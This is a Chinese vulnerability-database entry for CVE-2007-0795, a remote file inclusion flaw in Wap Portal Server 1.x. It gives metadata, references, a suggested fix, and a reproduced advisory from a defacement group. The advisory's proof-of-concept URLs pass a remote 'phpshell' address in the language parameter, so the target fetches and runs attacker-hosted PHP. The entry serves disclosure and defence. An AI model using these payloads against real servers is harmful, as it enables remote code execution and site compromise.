Wap Portal Server 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191832 漏洞类型 未知
发布时间 2007-02-06 更新时间 2007-02-06
CVE编号 CVE-2007-0795 CNNVD-ID CNNVD-200702-080
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86625
https://cxsecurity.com/issue/WLB-2007020021
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-080
|漏洞详情
WapPortalServer1.x版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助对(1)index.php和(2)admin/index.php的语言参数中的一个URL,执行任意PHP代码。
|漏洞EXP
+--------------------------------------------------------------------
+
+ Wap Portal Serve 1.* <= Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: Wap Portal Server
+ Venedor ...........: http://www.sakic.net
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/ http://www.worlddefacers.de/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------
+
+ Code index.php:
+
+ .....
+ include("regglobals.php");
+ include("config.php");
+ include("lang/".$language);
+ 
+ .....
+
+--------------------------------------------------------------------
+
+ Solution:
+ Add this line to your php-file:
+
+ $language ="user/dir" //Your language path
+
+--------------------------------------------------------------------
+ PoC:
+
+ http://[target]/index.php?language=http://phpshell
+ http://[target]/admin/index.php?language=http://phpshell
+
+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
+ || Pro Hacker || - || DARKFIRE ||
+
+-------------------------[ W D T ]----------------------------------
|受影响的产品
Wap Wap Portal Server 1.x
|参考资料

来源:BUGTRAQ
名称:20070203WapPortalServe1.*<=RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/459147/100/0/threaded
来源:OSVDB
名称:35770
链接:http://osvdb.org/35770
来源:OSVDB
名称:33672
链接:http://osvdb.org/33672
来源:OSVDB
名称:33671
链接:http://osvdb.org/33671
来源:XF
名称:wapportal-index-file-include(32196)
链接:http://xforce.iss.net/xforce/xfdb/32196
来源:SREASON
名称:2216
链接:http://securityreason.com/securityalert/2216